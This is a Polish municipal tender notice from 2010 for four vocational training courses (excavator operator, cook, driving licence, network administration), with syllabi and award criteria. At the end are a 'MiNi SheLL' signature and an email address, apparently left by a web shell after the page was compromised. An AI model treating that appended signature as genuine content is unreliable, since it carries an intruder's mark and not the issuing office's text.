<p class="bold">III.6) INNE DOKUMENTY</p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>- Zaświadczenie o wpisie do rejestru instytucji szkoleniowych prowadzony przez Wojewódzki Urząd Pracy właściwy dla siedziby Wykonawcy, zgodnie z art. 20 ust. 1 ustawy z dnia 20 kwietnia 2004 r. o promocji zatrudnienia i instytucjach rynku pracy (Dz. U. z 2008 r. Nr 69 poz. 415 ze zm.) 

-kosztorys ofertowy (zał. nr 1a do SIWZ).

- pełnomocnictwo do reprezentowania Wykonawcy, o ile ofertę składa pełnomocnik
- Certyfikaty jakości usług posiadane przez instytucję szkoleniową (np. akredytacje, certyfikaty systemu zarządzania jakością kształcenia/szkolenia ISO lub inny znak jakości itp.),</p>
<p><b>III.7) Czy ogranicza się możliwość ubiegania się o zamówienie publiczne tylko dla wykonawców, u których ponad 50 % pracowników stanowią osoby niepełnosprawne: </b>nie</p>


<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p><ul class="kh_indent_1">
<li>1 - Cena - 90</li>
<li>2 - CERTYFIKATY JAKOŚCI USŁUG - 10</li>
</ul>
<p><b>IV.2.2) Czy przeprowadzona będzie aukcja elektroniczna:</b> nie.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>Czy przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b>tak</p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>Wszelkie istotne postanowienia umowy o udzielenie zamówienia publicznego zawarto w jej wzorze, który stanowi załącznik nr 5 do niniejszej SIWZ.
Zamawiający na podstawie art.144 ust.1 ustawy Pzp- zastrzega sobie prawo do zmiany treści istotnych postanowień umowy:
1)	na wskutek powstałych zmian wynikłych z okoliczności, których nie można było przewidzieć w chwili zawarcia umowy
2)	w zakresie terminów realizacji z przyczyn, których nie można było przewidzieć w chwili zawarcia umowy
3)	w zakresie zmian liczby uczestników (odbiorców usług) w sytuacjach niezależnych od zamawiającego, których nie mógł przewidzieć w chwili zawarcia umowy np. choroba uczestnika itp.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.gopsmiechow.eu<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Gminnym Ośrodku Pomocy Społecznej, ul. Szpitalna 1, 32-200 Miechów, pok. Nr 1.</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 21.09.2010 godzina 14:00, miejsce: Gminnym Ośrodku Pomocy Społecznej, ul. Szpitalna 1, 32-200 Miechów, pok. Nr 1.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Kurs operatora koparko-ładowarki wszystkie typy klasa III - 3 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs operatora koparko-ładowarki wszystkie typy klasa III - 3 osoby

Cel: nabycie nowych i rozwój posiadanych umiejętności zawodowych poprzez przygotowanie osób do wykonywania zawodu operatora koparko-ładowarki wszystkie typy klasa III
Zakres tematyczny zajęć:

L.p.	Przedmiot nauczania	Liczba godzin nauczania
Ogółem	176
1.	Użytkowanie eksploatacyjne	8
2.	Dokumentacja techniczna	8
3.	Bezpieczeństwo i higiena pracy	8
4.	Podstawy elektrotechniki	8
5.	Silniki spalinowe	16
6.	Elementy hydrauliki	16
7.	Budowa koparko-ładowarki	32
8.	Technologia robót	20
9.	Zajęcia praktyczne	60

Liczba godzin szkoleniowych - minimum 176 godzin + egzamin
Kurs musi zakończyć się egzaminem państwowym przed komisją Instytutu Mechanizacji Budownictwa i Górnictwa Skalnego oraz uzyskaniem uprawnień przez uczestnika do wykonywania zawodu operatora koparko-ładowarki.</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. CERTYFIKATY JAKOŚCI USŁUG - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Kurs gastronomiczny - Kucharz - 3 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs gastronomiczny - Kucharz - 3 osoby

Cel: nabycie nowych i rozwój posiadanych umiejętności zawodowych poprzez przygotowanie uczestników kursu do pracy w kuchni na stanowisku kucharza w szczególności poznanie zasad żywienia, organizacji produkcji, przepisów kulinarnych.

Zakres tematyczny zajęć:
	Zasady BHP i minimum sanitarne
	Ekonomia organizacyjna
	Obsługa konsumenta
	Technologie gastronomiczne z towaroznawstwa
	Maszyny i sprzęty (wyposażenie techniczne): budowa, obsługa, zastosowanie
	Kuchnia i jej zagadnienia:
	Podstawy żywienia człowieka
	Obróbka termiczna mięsa
	Sporządzanie potraw z mięsa, zwierząt rzeźnych i dziczyzny
	Sporządzanie potraw z ryb
	Sporządzanie potraw półmięsnych i jarskich
	Przygotowanie sosów gorących
	Przygotowanie deserów oraz napojów zimnych i gorących
	Przygotowanie zakąsek
	Sporządzanie potraw dietetycznych
	Sporządzanie potraw kuchni staropolskiej oraz kuchni innych narodów
	Sporządzanie potraw na przyjęcia okolicznościowe i inne imprezy specjalne
	Warsztaty ogólnorozwojowe z treningiem interpersonalnym
	zajęcia praktyczne ( Restauracje, Puby, Stołówki)

Liczba godzin szkoleniowych: minimum 50 godz. teoretycznych 130 praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom.
	Wykonawca zapewni warunki szkolenia zgodne z przepisami BHP. 
	Wykonawca wyposaży kursantów w ubrania robocze (fartuch, okrycia głowy, rękawice, obuwie). 
	Wykonawca zapewnia wszelkie niezbędne materiały szkoleniowe i dydaktyczne związane z przeprowadzeniem kursu tj. produkty żywnościowe na warsztaty symulacyjne, podręczniki, zeszyty, długopisy, teczki na materiały szkoleniowe

Szkolenie winno zakończyć się wydaniem zaświadczenia o ukończeniu szkolenia zgodnie z rozporządzeniem MEN z dnia 03.02.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006, Nr 31 poz.216).
Zamawiający zaleca, aby Wykonawca prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości organizowanego kursu.
Zamawiający zaleca, aby Wykonawca sprawdzał efekty szkolenia między innymi poprzez: aktywność kursantów, frekwencję na zajęciach, pracę końcową, zaliczenie całego programu, egzamin..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. CERTYFIKATY JAKOŚCI USŁUG - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 3 <b>NAZWA:</b> Kurs prawa jazdy kat. B - 4 osoby.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs prawa jazdy kat. B - 4 osoby
Cel: nabycie uprawnień przez uczestnika kursu do kierowania pojazdami o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t
	Kurs musi być przeprowadzony zgodnie z Rozporządzeniem Ministra Infrastruktury z 27 października 2005 roku z późniejszymi zmianami (Dz.U. Nr 217 z dnia 31 października 2005r.) w sprawie szkolenia, egzaminowania i uzyskiwania uprawnień przez kierujących pojazdami, instruktorów i egzaminatorów

Liczba godzin szkoleniowych - min. 30 godzin teoretycznych, min. 30 godzin praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom. 
Kurs winien zakończyć się egzaminem oraz uzyskaniem uprawnień do kierowania pojazdami o dopuszczalnej masie całkowitej nie przekraczającej 3,5 t (kat. B).</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.00.00-8.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. CERTYFIKATY JAKOŚCI USŁUG - 10</li>
</ul>
</li>
</ul><br>
<p><b>CZĘŚĆ Nr:</b> 4 <b>NAZWA:</b> Kurs komputerowy - 1 osoba.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> Kurs komputerowy - 1 osoba
Cel: nabycie przez uczestników kursu specjalistycznych umiejętności w zakresie samodzielnego administrowania sieciami komputerowymi. 
Zakres przedmiotowy szkolenia winien zawierać teoretyczne zagadnienia dotyczące architektury, technologii i bezpieczeństwa sieci komputerowych, praktyczne umiejętności w zakresie administrowania sieciami takich systemów jak: Windows, NetWare, Linux.

Zakres tematyczny zajęć:

I. Wiadomości ogólne
1. Rodzaje sieci komputerowych 
2. Zadania administratora 
3. Urządzenia sieciowe 
4. Rodzaje kabli 
5. Model OSI 
6. Protokoły sieciowe 
7. Adresowanie IP 
8. Sieci peer-to-peer 
9. Zarządzanie serwerem 
10. Bezpieczeństwo

II. Sieci z serwerem Windows
1. Grupy robocze i domeny
2. Użytkownicy i grupy
3. Uprawnienia do plików i folderów
4. Drukowanie w sieci
5. Praca z dyskami
6. Logowanie do serwera
7. DHCP, WINS

III. Sieci z systemem Novell NetWare
1. Wiadomości ogólne
2. Użytkownicy i grupy
3. Uprawnienia do plików i folderów
4. Prawa obiektowe
5. Logowanie do serwera
6. Praca z dyskami
7. Skrypty logowania

IV. Podstawy systemu Linux
1. Wprowadzenie do systemu
2. Użytkownicy i ich prawa
3. Praca z dyskami i plikami
V. Serwer z systemem Linux 
1. Logowanie do serwera 
2. Zarządzanie obiektami 
3. Serwer plików Samba 
4. Drukowanie (Samba, CUPS)
5. Zarządzanie serwerem Apache

Szkolenie winno zakończyć się wydaniem zaświadczenia o ukończeniu szkolenia zgodnie z rozporządzeniem MEN z dnia 03.02.2006r. w sprawie uzyskiwania i uzupełniania przez osoby dorosłe wiedzy ogólnej, umiejętności i kwalifikacji zawodowych w formach pozaszkolnych (Dz. U. z 2006, Nr 31 poz.216).
Zamawiający zaleca, aby Wykonawca prowadził nadzór wewnętrzny nad szkoleniem służący podnoszeniu jakości organizowanego kursu.
Zamawiający zaleca, aby Wykonawca sprawdzał efekty szkolenia między innymi poprzez: aktywność kursantów, frekwencję na zajęciach, pracę końcową, zaliczenie całego programu, egzamin.

Liczba godzin szkoleniowych (lekcyjnych) - min. 30 godzin teoretycznych, min. 90 godzin praktycznych + egzamin. Godzina szkolenia teoretycznego równa się 45 minutom, a szkolenia praktycznego 60 minutom..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 80.53.31.00-0, 80.53.32.00-1.</p></li>
<li><p><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 30.11.2010.</p></li>
<li><p><b>4) Kryteria oceny ofert: </b>cena oraz dodatkowe kryteria i ich znaczenie:</p>
<ul class="kh_indent_1">
<li>1. Cena - 90</li>
<li>2. CERTYFIKATY JAKOŚCI USŁUG - 10</li>
</ul>
</li>
</ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com